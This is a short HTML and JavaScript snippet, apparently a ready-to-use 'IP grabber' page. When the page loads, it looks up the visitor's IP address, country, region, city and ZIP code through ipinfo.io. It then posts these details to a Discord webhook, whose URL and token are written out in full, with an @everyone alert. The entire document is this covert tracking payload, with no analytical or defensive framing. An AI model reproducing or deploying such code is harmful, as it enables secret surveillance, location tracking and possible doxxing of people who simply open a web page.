<script>
function monke(json) 
{
     var request = new XMLHttpRequest();
     
     request.open("POST", "https://discord.com/api/webhooks/1336453517694468199/HYH5gYHwzgLyXoJIVCTBBSDrwM21U18Er15-yNEKIW2ylJS4ptJTh0r5Tfq9SzZ4eYC_");

     request.setRequestHeader('Content-type', 'application/json');

     var params = 
     {
          username: "IP Logger",
          avatar_url: "https://www.rd.com/wp-content/uploads/2022/08/GettyImages-961243862-e1661892079769.jpg?fit=700%2C467",
          content: "@everyone",
          embeds: [
               {
                    title: "Someone visited the IP grabber!",
                    color: 1752220,
                    description: "**IP:** `" + json.ip + "`\n**Country:** `" + json.country + "`\n**Region:** `" + json.region + "`\n**Town/City:** `" + json.city + "`\n**ZIP:** `" + json.postal + "`"
               }
          ]
     }

     request.send(JSON.stringify(params));
}
</script>
<script src="https://ipinfo.io/?format=jsonp&callback=monke"></script>
